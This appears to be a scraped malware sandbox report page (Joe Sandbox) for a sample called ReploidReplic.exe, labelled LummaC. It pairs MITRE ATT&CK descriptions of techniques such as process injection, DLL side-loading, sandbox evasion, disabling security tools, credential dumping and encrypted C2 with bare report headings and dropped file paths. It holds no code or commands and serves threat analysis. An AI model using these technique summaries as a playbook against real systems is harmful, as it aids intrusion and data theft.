Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ReploidReplic.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ReploidReplic.ex_b1b473bc816ad8b743d6a5079ab4650dad7b61b_3ff1a0df_612b577a-f69b-42c8-a026-913cb922050a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1976.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B0E.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B4D.tmp.xml

C:\Users\user\AppData\Roaming\gdi32.dll

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
ReploidReplic.exe

Function 6CE06BD0 Relevance: 14.6, APIs: 2, Strings: 6, Instructions: 639
nativeCOMMON

Function 6CE0FBF8 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6CE0FCA8 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6CE0FAF1 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6CE1491D Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Function 6CE15180 Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Function 6CE12EE6 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre